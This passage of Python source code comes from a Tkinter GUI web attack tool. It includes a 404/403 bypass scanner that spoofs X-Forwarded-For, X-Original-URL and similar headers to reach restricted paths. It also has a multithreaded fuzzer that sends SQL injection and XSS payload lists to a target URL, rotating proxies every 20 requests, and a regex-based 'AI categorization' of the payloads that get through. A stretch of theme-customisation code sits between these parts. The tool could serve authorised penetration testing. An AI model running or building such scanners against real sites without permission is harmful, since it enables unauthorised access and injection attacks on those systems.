                            is_404_page = True
                    
                    # Check content length difference
                    length_diff = abs(content_length - baseline_length)
                    if length_diff > 200 and not is_404_page:
                        # Significantly different content length - potential bypass
                        is_404_page = False
                
                # Determine status
                if code < 400 and not is_404_page:
                    status = "BYPASSED!"
                    self.bypass_log(f"✅ {payload}: HTTP {code} - 404 BYPASS SUCCESSFUL!", 'success')
                    successful_bypasses.append((payload, status, code, content_length, "Standard Headers"))
                    self.bypass_tree.insert('', 'end', values=(payload, status, code, content_length, "YES"), tags=('success',))
                else:
                    status = "BLOCKED" if code >= 400 else "POSSIBLE"
                    tag = 'blocked' if code >= 400 else 'normal'
                    self.bypass_log(f"❌ {payload}: HTTP {code}", 'warning' if code >= 400 else 'info')
                    self.bypass_tree.insert('', 'end', values=(payload, status, code, content_length, "NO"), tags=(tag,))
                
                tests_completed += 1
                
                # 2. Now try with specific headers from the IP payloads file
                if code >= 400:  # Only try header tricks if initial request failed
                    # Load the IP payloads file if available
                    ip_payloads = []
                    base_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "Payloads", "404")
                    ip_file = os.path.join(base_path, "ip_payloads.txt")
                    
                    if os.path.exists(ip_file):
                        try:
                            with open(ip_file, 'r', encoding='utf-8') as f:
                                ip_payloads = [line.strip() for line in f.readlines() if line.strip()][:5]  # Take first 5 IPs
                                
                            # Try with X-Forwarded-For header
                            for ip in ip_payloads:
                                if self.stop_scanning:
                                    break
                                    
                                ip_headers = headers.copy()
                                ip_headers['X-Forwarded-For'] = ip
                                ip_headers['Client-IP'] = ip
                                ip_headers['X-Client-IP'] = ip
                                ip_headers['X-Real-IP'] = ip
                                
                                self.bypass_log(f"🔄 Testing {payload} with IP Headers: {ip}", 'info')
                                
                                if method == 'GET':
                                    response = requests.get(url, headers=ip_headers, timeout=10)
                                elif method == 'POST':
                                    response = requests.post(url, headers=ip_headers, timeout=10)
                                else:  # HEAD
                                    response = requests.head(url, headers=ip_headers, timeout=10)
                                
                                code = response.status_code
                                content = response.text if method != 'HEAD' else ""
                                content_length = len(content)
                                
                                if code < 400:
                                    status = "BYPASSED!"
                                    self.bypass_log(f"✅ {payload} with IP Header: {ip}: HTTP {code} - BYPASS SUCCESSFUL!", 'success')
                                    successful_bypasses.append((payload, status, code, content_length, f"IP Headers: {ip}"))
                                    self.bypass_tree.insert('', 'end', values=(f"{payload} (IP: {ip})", 
                                                                            status, code, content_length, "YES"), 
                                                          tags=('success',))
                                
                                tests_completed += 1
                                progress = (tests_completed / total_tests) * 100
                                self.status_var.set(f"⚡ 404 BYPASS SCANNING... {tests_completed}/{total_tests} ({progress:.1f}%)")
                                self.bypass_tree.yview_moveto(1)
                                self.update()
                                
                            # Try with special URL-based headers
                            special_headers = [
                                ('X-Original-URL', '/admin'),
                                ('X-Rewrite-URL', '/admin'),
                                ('X-Custom-IP-Authorization', '127.0.0.1'),
                                ('X-Override-URL', '/admin'),
                                ('Referer', 'https://example.com/admin')
                            ]
                            
                            for header_name, header_value in special_headers:
                                if self.stop_scanning:
                                    break
                                    
                                special_headers_dict = headers.copy()
                                special_headers_dict[header_name] = header_value
                                
                                self.bypass_log(f"🔄 Testing {payload} with {header_name}: {header_value}", 'info')
                                
                                if method == 'GET':
                                    response = requests.get(url, headers=special_headers_dict, timeout=10)
                                elif method == 'POST':
                                    response = requests.post(url, headers=special_headers_dict, timeout=10)
                                else:  # HEAD
                                    response = requests.head(url, headers=special_headers_dict, timeout=10)
                                
                                code = response.status_code
                                content = response.text if method != 'HEAD' else ""
                                content_length = len(content)
                                
                                if code < 400:
                                    status = "BYPASSED!"
                                    self.bypass_log(f"✅ {payload} with {header_name}: {header_value}: HTTP {code} - BYPASS SUCCESSFUL!", 'success')
                                    successful_bypasses.append((payload, status, code, content_length, f"{header_name}: {header_value}"))
                                    self.bypass_tree.insert('', 'end', values=(f"{payload} ({header_name}: {header_value})", 
                                                                            status, code, content_length, "YES"), 
                                                          tags=('success',))
                                
                                tests_completed += 1
                                progress = (tests_completed / total_tests) * 100
                                self.status_var.set(f"⚡ 404 BYPASS SCANNING... {tests_completed}/{total_tests} ({progress:.1f}%)")
                                self.bypass_tree.yview_moveto(1)
                                self.update()
                                
                        except Exception as e:
                            self.bypass_log(f"❌ Error with IP payloads: {str(e)}", 'error')
                
            except Exception as e:
                self.bypass_log(f"❌ {payload}: {str(e)}", 'error')
                self.bypass_tree.insert('', 'end', values=(payload, "ERROR", "-", "-", "NO"), tags=('blocked',))
                tests_completed += 1
            
            # Update progress
            progress = (tests_completed / total_tests) * 100
            self.status_var.set(f"⚡ 404 BYPASS SCANNING... {tests_completed}/{total_tests} ({progress:.1f}%)")
            self.bypass_tree.yview_moveto(1)
            self.update()
        
        # Configure tag for successful bypass
        self.bypass_tree.tag_configure('success', foreground=self.colors['success'])
        self.bypass_tree.tag_configure('blocked', foreground=self.colors['warning'])
        
        # Summary
        self.bypass_log("\n" + "="*60, 'info')
        self.bypass_log("🔎 404 BYPASS SCAN SUMMARY", 'info')
        self.bypass_log("="*60, 'info')
        self.bypass_log(f"\n✅ SUCCESSFUL BYPASSES: {len(successful_bypasses)}", 'success')
        
        for payload, status, code, cl, header_info in successful_bypasses[:10]:
            self.bypass_log(f"  • {payload} | HTTP {code} | {header_info}", 'success')
        
        if len(successful_bypasses) > 10:
            self.bypass_log(f"  ... and {len(successful_bypasses) - 10} more", 'info')
        
        # Reset UI
        self.bypass_start_btn.config(state='normal', text="🚀 START 404 SCAN")
        self.bypass_stop_btn.config(state='disabled')
        
        if self.stop_scanning:
            self.status_var.set(f"⚡ 404 BYPASS SCAN STOPPED")
        else:
            self.status_var.set(f"⚡ 404 BYPASS SCAN COMPLETE - {len(successful_bypasses)} BYPASSES FOUND!")
    
    def open_theme_settings(self):
        """Open theme customization window"""
        theme_window = tk.Toplevel(self)
        theme_window.title("🎨 Theme Customization")
        theme_window.geometry("600x500")
        theme_window.configure(bg=self.colors['bg_dark'])
        
        # Header
        header = tk.Label(theme_window, text="CUSTOMIZE YOUR THEME",
                         font=('Arial', 14, 'bold'), fg=self.colors['accent'],
                         bg=self.colors['bg_dark'])
        header.pack(pady=20)
        
        # Color options
        color_frame = tk.Frame(theme_window, bg=self.colors['bg_dark'])
        color_frame.pack(fill='both', expand=True, padx=20, pady=10)
        
        color_options = [
            ('Background Dark', 'bg_dark'),
            ('Background Medium', 'bg_medium'),
            ('Background Light', 'bg_light'),
            ('Primary Accent', 'accent'),
            ('Secondary Accent', 'accent2'),
            ('Tertiary Accent', 'accent3'),
            ('Success Color', 'success'),
            ('Error Color', 'error'),
            ('Warning Color', 'warning')
        ]
        
        self.color_vars = {}
        
        for i, (label, key) in enumerate(color_options):
            row_frame = tk.Frame(color_frame, bg=self.colors['bg_dark'])
            row_frame.pack(fill='x', pady=5)
            
            # Label
            lbl = tk.Label(row_frame, text=label + ":", width=20, anchor='w',
                          font=('Arial', 10), fg=self.colors['text'],
                          bg=self.colors['bg_dark'])
            lbl.pack(side='left', padx=10)
            
            # Color preview
            color_preview = tk.Label(row_frame, text="   ", width=5,
                                   bg=self.colors[key], relief='raised')
            color_preview.pack(side='left', padx=5)
            
            # Color entry
            var = tk.StringVar(value=self.colors[key])
            self.color_vars[key] = (var, color_preview)
            
            entry = tk.Entry(row_frame, textvariable=var, width=10,
                           font=('Arial', 10), bg=self.colors['bg_light'],
                           fg=self.colors['text'])
            entry.pack(side='left', padx=5)
            
            # Color picker button
            pick_btn = tk.Button(row_frame, text="Pick", command=lambda k=key: self.pick_color(k),
                               font=('Arial', 9), bg=self.colors['bg_medium'],
                               fg=self.colors['text'])
            pick_btn.pack(side='left', padx=5)
        
        # Preset themes
        preset_frame = tk.LabelFrame(theme_window, text="PRESET THEMES",
                                   font=('Arial', 10, 'bold'), fg=self.colors['accent'],
                                   bg=self.colors['bg_dark'], bd=2)
        preset_frame.pack(fill='x', padx=20, pady=10)
        
        presets = {
            '� GitHub Dark': {
                'bg_dark': '#0D1117', 'bg_medium': '#161B22', 'bg_light': '#21262D',
                'accent': '#58A6FF', 'accent2': '#EC6CB9', 'accent3': '#79C0FF',
                'success': '#7CE38B', 'error': '#F85149', 'warning': '#DBAB0A'
            },
            '�🟢 Matrix': {
                'bg_dark': '#000000', 'bg_medium': '#0a0a0a', 'bg_light': '#1a1a1a',
                'accent': '#00ff00', 'accent2': '#008f11', 'accent3': '#00ff88',
                'success': '#00ff00', 'error': '#ff0000', 'warning': '#ffff00'
            },
            '� Dracula': {
                'bg_dark': '#282A36', 'bg_medium': '#343746', 'bg_light': '#44475A',
                'accent': '#BD93F9', 'accent2': '#FF79C6', 'accent3': '#8BE9FD',
                'success': '#50FA7B', 'error': '#FF5555', 'warning': '#FFB86C'
            },
            '🎸 Synthwave': {
                'bg_dark': '#1a0033', 'bg_medium': '#2d1b69', 'bg_light': '#3e2d8f',
                'accent': '#ff00ff', 'accent2': '#00ffff', 'accent3': '#ff00aa',
                'success': '#00ff88', 'error': '#ff0055', 'warning': '#ffaa00'
            },
            '🌙 Nord': {
                'bg_dark': '#2E3440', 'bg_medium': '#3B4252', 'bg_light': '#434C5E',
                'accent': '#88C0D0', 'accent2': '#B48EAD', 'accent3': '#81A1C1',
                'success': '#A3BE8C', 'error': '#BF616A', 'warning': '#EBCB8B'
            },
            '🖤 Monokai': {
                'bg_dark': '#272822', 'bg_medium': '#32332D', 'bg_light': '#403E41',
                'accent': '#A6E22E', 'accent2': '#F92672', 'accent3': '#66D9EF',
                'success': '#A6E22E', 'error': '#F92672', 'warning': '#FD971F'
            },
            '🌟 Tokyo Night': {
                'bg_dark': '#1A1B26', 'bg_medium': '#24283B', 'bg_light': '#414868',
                'accent': '#7AA2F7', 'accent2': '#BB9AF7', 'accent3': '#2AC3DE',
                'success': '#9ECE6A', 'error': '#F7768E', 'warning': '#E0AF68'
            }
        }
        
        preset_btns = tk.Frame(preset_frame, bg=self.colors['bg_dark'])
        preset_btns.pack(pady=10)
        
        for name, theme in presets.items():
            btn = tk.Button(preset_btns, text=name, 
                          command=lambda t=theme: self.apply_preset_theme(t),
                          font=('Arial', 10), bg=self.colors['bg_medium'],
                          fg=self.colors['text'], width=12)
            btn.pack(side='left', padx=5)
        
        # Apply button
        apply_frame = tk.Frame(theme_window, bg=self.colors['bg_dark'])
        apply_frame.pack(pady=20)
        
        apply_btn = self.create_neon_button(apply_frame, "✅ APPLY THEME", 
                                          lambda: self.apply_theme(theme_window),
                                          self.colors['success'])
        apply_btn.pack()
    
    def pick_color(self, key):
        """Open color picker dialog"""
        color = colorchooser.askcolor(initialcolor=self.colors[key])
        if color[1]:
            var, preview = self.color_vars[key]
            var.set(color[1])
            preview.config(bg=color[1])
    
    def apply_preset_theme(self, theme):
        """Apply a preset theme"""
        for key, color in theme.items():
            if key in self.color_vars:
                var, preview = self.color_vars[key]
                var.set(color)
                preview.config(bg=color)
    
    def apply_theme(self, window):
        """Apply the custom theme"""
        # Update colors
        for key, (var, _) in self.color_vars.items():
            self.colors[key] = var.get()
        
        # Update main window
        self.configure(bg=self.colors['bg_dark'])
        
        # Update ttk styles
        self.setup_styles()
        
        # Update all tracked widgets
        for widget in self.themed_widgets:
            if widget.winfo_exists():
                self.update_widget_theme(widget)
        
        # Update tree tags
        self.tree.tag_configure('success', foreground=self.colors['success'])
        self.tree.tag_configure('blocked', foreground=self.colors['warning'])
        self.tree.tag_configure('content_diff', foreground=self.colors['accent3'])
        
        # Update XSS tree tags if exists
        if hasattr(self, 'xss_tree'):
            self.xss_tree.tag_configure('xss_found', foreground=self.colors['success'])
            
        # Update LFI tree tags if exists
        if hasattr(self, 'lfi_tree'):
            self.lfi_tree.tag_configure('lfi_found', foreground=self.colors['success'])
            
        # Update 404 bypass tree tags if exists
        if hasattr(self, 'bypass_tree'):
            self.bypass_tree.tag_configure('success', foreground=self.colors['success'])
            self.bypass_tree.tag_configure('blocked', foreground=self.colors['warning'])
        
        # Update log text tags
        self.log_text.tag_config('timestamp', foreground=self.colors['text_dim'])
        self.log_text.tag_config('error', foreground=self.colors['error'])
        self.log_text.tag_config('success', foreground=self.colors['success'])
        self.log_text.tag_config('warning', foreground=self.colors['warning'])
        self.log_text.tag_config('info', foreground=self.colors['text'])
        
        # Update XSS log text tags if exists
        if hasattr(self, 'xss_log_text'):
            self.xss_log_text.tag_config('timestamp', foreground=self.colors['text_dim'])
            self.xss_log_text.tag_config('error', foreground=self.colors['error'])
            self.xss_log_text.tag_config('success', foreground=self.colors['success'])
            self.xss_log_text.tag_config('warning', foreground=self.colors['warning'])
            self.xss_log_text.tag_config('info', foreground=self.colors['text'])
            
        # Update LFI log text tags if exists
        if hasattr(self, 'lfi_log_text'):
            self.lfi_log_text.tag_config('timestamp', foreground=self.colors['text_dim'])
            self.lfi_log_text.tag_config('error', foreground=self.colors['error'])
            self.lfi_log_text.tag_config('success', foreground=self.colors['success'])
            self.lfi_log_text.tag_config('warning', foreground=self.colors['warning'])
            self.lfi_log_text.tag_config('info', foreground=self.colors['text'])
            
        # Update 404 bypass log text tags if exists
        if hasattr(self, 'bypass_log_text'):
            self.bypass_log_text.tag_config('timestamp', foreground=self.colors['text_dim'])
            self.bypass_log_text.tag_config('error', foreground=self.colors['error'])
            self.bypass_log_text.tag_config('success', foreground=self.colors['success'])
            self.bypass_log_text.tag_config('warning', foreground=self.colors['warning'])
            self.bypass_log_text.tag_config('info', foreground=self.colors['text'])
        
        self.log("✅ Theme applied successfully!", 'success')
        self.status_var.set("⚡ THEME UPDATED")
        
        window.destroy()
    
    def stop_testing(self):
        """Stop the current scanning process"""
        self.stop_scanning = True
        self.stop_btn.config(state='disabled')
        self.log("🛑 Stopping scan...", 'warning')
        self.status_var.set("⚡ STOPPING SCAN...")
    
    def clear_results(self):
        """Clear all results"""
        # NON toccare stop_scanning qui!
        for item in self.tree.get_children():
            self.tree.delete(item)
        self.log_text.delete('1.0', 'end')
        self.analysis_text.delete('1.0', 'end')
        self.all_results = []
        self.baseline_content_length = None
        self.status_var.set("⚡ CLEARED - READY TO HACK")
    
    def show_load_payloads_menu(self, event=None):
        """Show menu for loading payloads from different sources"""
        load_menu = tk.Menu(self, tearoff=0, bg=self.colors['bg_dark'], fg=self.colors['text'],
                           activebackground=self.colors['bg_light'], activeforeground=self.colors['accent'])
        
        # File option
        load_menu.add_command(label="📄 From File...", command=self.load_payloads_from_file)
        
        # Auto-load options
        load_menu.add_separator()
        load_menu.add_command(label="🔄 Auto-Load SQL Injection Payloads", 
                             command=lambda: self.auto_load_payloads('sqli'))
        load_menu.add_command(label="🔄 Auto-Load XSS Payloads", 
                             command=lambda: self.auto_load_payloads('xss'))
        load_menu.add_command(label="🔄 Auto-Load 404 Bypass Payloads", 
                             command=lambda: self.auto_load_payloads('404'))
        
        # Display the menu
        try:
            load_menu.tk_popup(event.x_root, event.y_root)
        finally:
            load_menu.grab_release()
    
    def load_payloads_from_file(self):
        """Load payloads from a selected file"""
        filepath = filedialog.askopenfilename(
            title="Select Payload File",
            filetypes=[("Text files", "*.txt"), ("All files", "*.*")]
        )
        if not filepath:
            return
        
        try:
            with open(filepath, 'r', encoding='utf-8') as f:
                payloads = [line.strip() for line in f if line.strip()]
            
            self.tokens_text.delete('1.0', 'end')
            self.tokens_text.insert('1.0', '\n'.join(payloads))
            
            self.log(f"✅ Loaded {len(payloads)} payloads from {filepath}", 'success')
            self.status_var.set(f"⚡ LOADED {len(payloads)} PAYLOADS")
        except Exception as e:
            self.log(f"❌ Error loading file: {str(e)}", 'error')
            messagebox.showerror("Error", f"Failed to load file: {str(e)}")
    
    def auto_load_payloads(self, payload_type):
        """Auto-load payloads from directory based on type"""
        payloads = self.load_payloads_from_directory(payload_type)
        if payloads:
            # Determine which text widget to update based on payload type
            if payload_type == 'sqli':
                self.tokens_text.delete('1.0', 'end')
                self.tokens_text.insert('1.0', '\n'.join(payloads))
                self.notebook.select(0)  # Switch to main testing tab
            elif payload_type == 'xss':
                self.xss_payloads_text.delete('1.0', 'end')
                self.xss_payloads_text.insert('1.0', '\n'.join(payloads))
                self.notebook.select(2)  # Switch to XSS tab
            elif payload_type == '404':
                self.bypass_payloads_text.delete('1.0', 'end')
                self.bypass_payloads_text.insert('1.0', '\n'.join(payloads))
                self.notebook.select(4)  # Switch to 404 tab
    
    def load_payloads_from_directory(self, payload_type='sqli'):
        """Load payloads from organized directory structure
        
        Args:
            payload_type: Type of payload to load ('sqli', 'xss', '404')
        """
        base_dir = os.path.dirname(os.path.abspath(__file__))
        payloads_dir = os.path.join(base_dir, 'Payloads')
        
        if not os.path.exists(payloads_dir):
            self.log(f"❌ Payloads directory not found: {payloads_dir}", 'error')
            messagebox.showerror("Error", f"Payloads directory not found: {payloads_dir}")
            return []
        
        payloads = []
        files_loaded = 0
        
        if payload_type == 'sqli':
            # Load SQL injection payloads from detect directory
            sqli_detect_dir = os.path.join(payloads_dir, 'sqli', 'detect')
            for root, _, files in os.walk(sqli_detect_dir):
                for file in files:
                    if file.endswith('.txt'):
                        try:
                            with open(os.path.join(root, file), 'r', encoding='utf-8', errors='ignore') as f:
                                file_payloads = [line.strip() for line in f if line.strip()]
                                payloads.extend(file_payloads)
                                files_loaded += 1
                                self.log(f"✅ Loaded {len(file_payloads)} payloads from {os.path.join(root, file)}", 'success')
                        except Exception as e:
                            self.log(f"❌ Error loading {file}: {str(e)}", 'error')
        
        elif payload_type == 'xss':
            # Load XSS payloads
            xss_file = os.path.join(payloads_dir, 'xss', 'xss-payload-list.txt')
            if os.path.exists(xss_file):
                try:
                    with open(xss_file, 'r', encoding='utf-8', errors='ignore') as f:
                        xss_payloads = [line.strip() for line in f if line.strip()]
                        payloads.extend(xss_payloads)
                        files_loaded += 1
                        self.log(f"✅ Loaded {len(xss_payloads)} XSS payloads from {xss_file}", 'success')
                except Exception as e:
                    self.log(f"❌ Error loading XSS payloads: {str(e)}", 'error')
        
        elif payload_type == '404':
            # Load 404 bypass payloads
            bypass_dir = os.path.join(payloads_dir, '404')
            for file_type in ['header_payload_templates.txt', 'ip_payloads.txt', 'url_payloads.txt']:
                file_path = os.path.join(bypass_dir, file_type)
                if os.path.exists(file_path):
                    try:
                        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
                            file_payloads = [line.strip() for line in f if line.strip()]
                            payloads.extend(file_payloads)
                            files_loaded += 1
                            self.log(f"✅ Loaded {len(file_payloads)} 404 bypass payloads from {file_path}", 'success')
                    except Exception as e:
                        self.log(f"❌ Error loading {file_path}: {str(e)}", 'error')
        
        # Remove duplicates while preserving order
        unique_payloads = []
        seen = set()
        for payload in payloads:
            if payload not in seen:
                seen.add(payload)
                unique_payloads.append(payload)
        
        self.log(f"✅ Loaded total of {len(unique_payloads)} unique payloads from {files_loaded} files", 'success')
        return unique_payloads
    
    def parse_headers(self):
        """Parse headers from text"""
        headers = {}
        for line in self.headers_text.get('1.0', 'end').splitlines():
            if ':' in line:
                key, value = line.split(':', 1)
                headers[key.strip()] = value.strip()
        return headers
    
    def parse_proxies(self):
        """Parse proxy list"""
        if not self.proxy_enabled.get():
            return []
        
        proxies = []
        for line in self.proxy_text.get('1.0', 'end').splitlines():
            line = line.strip()
            if line:
                if line.startswith('socks5://'):
                    proxies.append({'http': line, 'https': line})
                else:
                    proxies.append({'http': line, 'https': line})
        return proxies
    
    def start_testing(self):
        """Start the testing process"""
        url_template = self.url_entry.get().strip()
        method = self.method.get()
        body_template = self.body_text.get('1.0', 'end').strip()
        headers = self.parse_headers()
        tokens = [line.strip() for line in self.tokens_text.get('1.0', 'end').splitlines() if line.strip()]
        proxies = self.parse_proxies()
        
        if not url_template or not tokens:
            messagebox.showerror("Error", "URL and tokens are required!")
            return
        
        # Prima pulisci i risultati
        self.clear_results()
        
        # POI reimposta stop_scanning a False (DOPO clear_results)
        self.stop_scanning = False
        
        self.start_btn.config(state='disabled', text="🔄 SCANNING...")
        self.stop_btn.config(state='normal')
        self.status_var.set(f"⚡ SCANNING {len(tokens)} PAYLOADS...")
        
        max_workers = self.thread_count.get()
        
        # Start testing in background thread
        self.scanning_thread = threading.Thread(
            target=self._run_tests,
            args=(method, url_template, body_template, headers, tokens, proxies, max_workers),
            daemon=True
        )
        self.scanning_thread.start()
    
    def _run_tests(self, method, url_template, body_template, headers, tokens, proxies, max_workers):
        """Run the actual tests"""
        results = []
        request_count = 0
        proxy_index = 0
        lock = threading.Lock()
        completed = 0
        total = len(tokens)
        
        # Get baseline content length first
        self.log("📊 Getting baseline content length...", 'info')
        baseline_url = url_template.format(token="test")
        baseline_content_length = 0
        
        try:
            session = requests.Session()
            session.headers.update(headers)
            if method == 'GET':
                response = session.get(baseline_url, timeout=10)
            else:
                response = session.post(baseline_url, data=body_template.format(token="test"), timeout=10)
            baseline_content_length = len(response.content)
            self.log(f"✅ Baseline content length: {baseline_content_length} bytes", 'success')
        except Exception as e:
            self.log(f"⚠️ Failed to get baseline: {str(e)}", 'warning')
        
        def get_proxy():
            nonlocal proxy_index, request_count
            if not proxies:
                return None
            
            with lock:
                request_count += 1
                if request_count % 20 == 0:
                    proxy_index = (proxy_index + 1) % len(proxies)
                    self.log(f"🔄 Switched to proxy {proxy_index + 1}/{len(proxies)}", 'info')
            
            return proxies[proxy_index]
        
        def test_token(token, idx):
            if self.stop_scanning:
                return None, None, None, None
                
            session = requests.Session()
            session.headers.update(headers)
            url = url_template.format(token=token)
            proxy = get_proxy()
            
            try:
                kwargs = {'timeout': 10}
                if proxy:
                    kwargs['proxies'] = proxy
                
                start_time = time.time()
                
                if method == 'GET':
                    response = session.get(url, **kwargs)
                else:
                    response = session.post(url, data=body_template.format(token=token), **kwargs)
                
                elapsed = time.time() - start_time
                code = response.status_code
                content_length = len(response.content)
                length_diff = content_length - baseline_content_length
                
                if code == 403:
                    status = 'BLOCKED'
                elif 300 <= code < 400 or code == 500:
                    status = 'ERROR'
                elif elapsed >= 3:
                    status = 'TIME-BASED'
                elif abs(length_diff) > 500:  # Significant content change
                    status = 'CONTENT-DIFF'
                else:
                    status = 'ALLOWED'
                
            except Exception as e:
                code = None
                status = 'ERROR'
                length_diff = 0
                self.log(f"❌ {token}: {str(e)}", 'error')
            
            # Log result with content length info
            if status == 'ALLOWED' and code == 200:
                self.log(f"✅ {token}: {status} ({code}) [CL: {length_diff:+d}]", 'success')
            elif status == 'BLOCKED':
                self.log(f"🚫 {token}: {status} ({code}) [CL: {length_diff:+d}]", 'warning')
            elif status == 'CONTENT-DIFF':
                self.log(f"📝 {token}: {status} ({code}) [CL: {length_diff:+d}]", 'warning')
            else:
                self.log(f"ℹ️ {token}: {status} ({code}) [CL: {length_diff:+d}]", 'info')
            
            return token, status, code, length_diff
        
        # Execute tests
        with ThreadPoolExecutor(max_workers=max_workers) as executor:
            futures = {executor.submit(test_token, token, i): token 
                      for i, token in enumerate(tokens, 1)}
            
            for future in as_completed(futures):
                if self.stop_scanning:
                    # Cancel remaining futures
                    for f in futures:
                        f.cancel()
                    break
                    
                result = future.result()
                if result[0] is not None:
                    token, status, code, length_diff = result
                    results.append((token, status, code, length_diff))
                    self.all_results.append((token, status, code))
                    
                    # Update tree for 200 and 403 codes
                    if code in (200, 403):
                        # Color coding in tree
                        if code == 200 and status == 'ALLOWED':
                            tag = 'success'
                        elif status == 'CONTENT-DIFF':
                            tag = 'content_diff'
                        else:
                            tag = 'blocked'
                        
                        # Add content length diff to display
                        display_status = f"{status} [{length_diff:+d}]" if length_diff != 0 else status
                        self.tree.insert('', 'end', values=(token, display_status, code), tags=(tag,))
                        self.tree.tag_configure('success', foreground=self.colors['success'])
                        self.tree.tag_configure('blocked', foreground=self.colors['warning'])
                        self.tree.tag_configure('content_diff', foreground=self.colors['accent3'])
                    
                    # Update progress
                    completed += 1
                    progress = (completed / total) * 100
                    self.status_var.set(f"⚡ SCANNING... {completed}/{total} ({progress:.1f}%)")
        
        # Summary
        if self.stop_scanning:
            self.log("\n🛑 SCAN STOPPED BY USER", 'warning')
        
        self.log("\n" + "="*60, 'info')
        self.log("📊 SCAN SUMMARY", 'info')
        self.log("="*60, 'info')
        
        # Group by status
        other = [(t, s, c, d) for t, s, c, d in results if c not in (200, 403)]
        blocked = [(t, s, c, d) for t, s, c, d in results if c == 403]
        allowed = [(t, s, c, d) for t, s, c, d in results if c == 200 and s == 'ALLOWED']
        content_diff = [(t, s, c, d) for t, s, c, d in results if s == 'CONTENT-DIFF']
        
        self.log(f"\n📋 OTHER RESPONSES ({len(other)} total):", 'info')
        for token, status, code, diff in other[:10]:  # Show first 10
            self.log(f"  • {token} | {status} | {code} | CL: {diff:+d}", 'info')
        if len(other) > 10:
            self.log(f"  ... and {len(other) - 10} more", 'info')
        
        self.log(f"\n🚫 BLOCKED ({len(blocked)} total):", 'warning')
        for token, status, code, diff in blocked[:10]:
            self.log(f"  • {token} | {status} | {code} | CL: {diff:+d}", 'warning')
        if len(blocked) > 10:
            self.log(f"  ... and {len(blocked) - 10} more", 'warning')
        
        self.log(f"\n📝 CONTENT DIFFERENCES ({len(content_diff)} total):", 'info')
        for token, status, code, diff in content_diff[:10]:
            self.log(f"  • {token} | {status} | {code} | CL: {diff:+d}", 'info')
        if len(content_diff) > 10:
            self.log(f"  ... and {len(content_diff) - 10} more", 'info')
        
        self.log(f"\n✅ ALLOWED ({len(allowed)} total):", 'success')
        for token, status, code, diff in allowed[:10]:
            self.log(f"  • {token} | {status} | {code} | CL: {diff:+d}", 'success')
        if len(allowed) > 10:
            self.log(f"  ... and {len(allowed) - 10} more", 'success')
        
        # Update UI
        self.start_btn.config(state='normal', text="🚀 START SCAN")
        self.stop_btn.config(state='disabled')
        
        if self.stop_scanning:
            self.status_var.set(f"⚡ SCAN STOPPED - {completed}/{total} tested, {len(allowed)} bypasses found")
        else:
            self.status_var.set(f"⚡ SCAN COMPLETE - {len(allowed)} BYPASSES FOUND!")
    
    def categorize_token(self, token):
        """AI categorization of tokens"""
        categories = []
        token_lower = token.lower()
        
        # Time-based patterns
        time_patterns = [
            r'sleep\s*\(', r'benchmark\s*\(', r'waitfor\s+delay',
            r'pg_sleep', r'wait\s+for\s+time', r'delay\s*\(',
            r'timeout', r'wait\('
        ]
        for pattern in time_patterns:
            if re.search(pattern, token_lower):
                categories.append("⏱️ TIME-BASED")
                break
        
        # Logic operators
        logic_patterns = {
            '🔀 CONDITIONAL': [r'\bif\b', r'\bcase\b', r'\bwhen\b', r'\bthen\b', r'\belse\b'],
            '🔁 BOOLEAN': [r'\band\b', r'\bor\b', r'\bnot\b', r'&&', r'\|\|', r'!'],
            '⚖️ COMPARISON': [r'[<>]=?', r'!=', r'==', r'\blike\b', r'\bin\b', r'\bbetween\b'],
        }
        for cat, patterns in logic_patterns.items():
            for pattern in patterns:
                if re.search(pattern, token_lower):
                    categories.append(cat)
                    break
        
        # SQL Injection patterns
        sql_patterns = {
            '🔗 SQL_UNION': [r'\bunion\b', r'\bselect\b.*\bfrom\b'],
            '📚 SQL_STACKED': [r';.*\b(select|update|delete|insert|drop)\b'],
            '💬 SQL_COMMENT': [r'--', r'/\*', r'#'],
            '➕ SQL_CONCAT': [r'\|\|', r'concat\s*\(', r'\+'],
            '🔢 SQL_HEX': [r'0x[0-9a-f]+', r'\\x[0-9a-f]+'],
            '📞 SQL_FUNCTION': [r'\w+\s*\(', r'char\s*\(', r'ascii\s*\(', r'substring\s*\('],
        }
        for cat, patterns in sql_patterns.items():
            for pattern in patterns:
                if re.search(pattern, token_lower):
                    categories.append(cat)
                    break
        
        # XSS patterns
        xss_patterns = {
            '📜 XSS_SCRIPT': [r'<script', r'javascript:', r'onerror\s*=', r'onload\s*='],
            '🏷️ XSS_HTML': [r'<[^>]+>', r'&lt;', r'&gt;'],
            '🎯 XSS_EVENT': [r'on\w+\s*='],
        }
        for cat, patterns in xss_patterns.items():
            for pattern in patterns:
                if re.search(pattern, token_lower):
                    categories.append(cat)
                    break
        
        # Encoding patterns
        encoding_patterns = {
            '🔤 URL_ENCODED': r'%[0-9a-f]{2}',
            '🌐 UNICODE': r'\\u[0-9a-f]{4}',
            '📄 HTML_ENTITY': r'&\w+;|&#\d+;|&#x[0-9a-f]+;',
            '🔐 BASE64': r'^[A-Za-z0-9+/]+={0,2}$',
        }
        for cat, pattern in encoding_patterns.items():
            if re.search(pattern, token):
                categories.append(cat)
        
        # Special characters
        if re.search(r'[^\w\s\-.,;:!?]', token):
            special_chars = set(re.findall(r'[^\w\s\-.,;:!?]', token))
            if special_chars:
                categories.append(f"✨ SPECIAL_CHARS: {','.join(special_chars)}")
        
        return categories if categories else ['❓ UNCATEGORIZED']
    
    def analyze_200s(self):
        """AI analysis of successful bypasses"""
        self.analysis_text.delete('1.0', 'end')
        
        # Filter 200 ALLOWED tokens
        allowed_tokens = [(t, s, c) for t, s, c in self.all_results if c == 200 and s == 'ALLOWED']
        
        if not allowed_tokens:
            self.analysis_text.insert('end', "❌ No successful bypasses found!\n", 'error')
            self.analysis_text.tag_config('error', foreground=self.colors['error'])
            return
        
        # Header
        self.analysis_text.insert('end', "╔═══════════════════════════════════════════════════════════╗\n", 'header')
        self.analysis_text.insert('end', "║          🤖 AI PAYLOAD CATEGORIZATION SYSTEM 🤖           ║\n", 'header')
        self.analysis_text.insert('end', "╚═══════════════════════════════════════════════════════════╝\n\n", 'header')
        self.analysis_text.tag_config('header', foreground=self.colors['accent'], font=('Courier', 12, 'bold'))
        
        self.analysis_text.insert('end', f"🎯 Analyzing {len(allowed_tokens)} successful bypasses...\n\n")
        
        # Categorize tokens
        categorized = defaultdict(list)
        for token, status, code in allowed_tokens:
            categories = self.categorize_token(token)
            for cat in categories:
                categorized[cat].append(token)
        
        # Display categories
        for i, (category, tokens) in enumerate(sorted(categorized.items(), key=lambda x: len(x[1]), reverse=True)):
